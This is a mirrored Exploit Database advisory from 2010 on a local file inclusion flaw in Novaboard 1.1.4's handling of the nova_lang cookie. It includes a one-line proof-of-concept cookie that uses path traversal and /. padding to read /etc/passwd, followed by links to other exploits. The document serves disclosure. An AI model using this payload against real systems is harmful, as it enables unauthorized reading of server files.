Novaboard 1.1.4 – Local File Inclusion

Exploit Database
91 阅读

作者： High-Tech Bridge SA

日期： 2010-10-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15324/

Vulnerability ID: HTB22657
Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html
Product: Novaboard 
Vendor: Novaboard( http://www.novaboard.net/ ) 
Vulnerable Version: 1.1.4 and probably prior versions 
Vendor Notification: 13 October 2010 
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.

The following PoC is available:


Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.

last Exploits
Novaboard 1.1.4 – Local File Inclusion的更多信息

PDF Album 1.7 iOS – Local File Inclusion：
Comment System 1.0 – ‘multiple’ Stored Cross-Site Scripting：
Intelbras Wireless N 150Mbps WRN240 – Authentication Bypass (Config Upload)：
Joomla! Component Magic Deals Web 1.2.0 – SQL Injection：
FuseTalk Forums 3.2 – ‘windowed’ Cross-Site Scripting：
AChecker 1.0 – ‘URI’ Cross-Site Scripting：
Raritan PowerIQ 4.1.0 – SQL Injection (Metasploit)：
ZenPhoto 1.4.11 – Remote File Inclusion：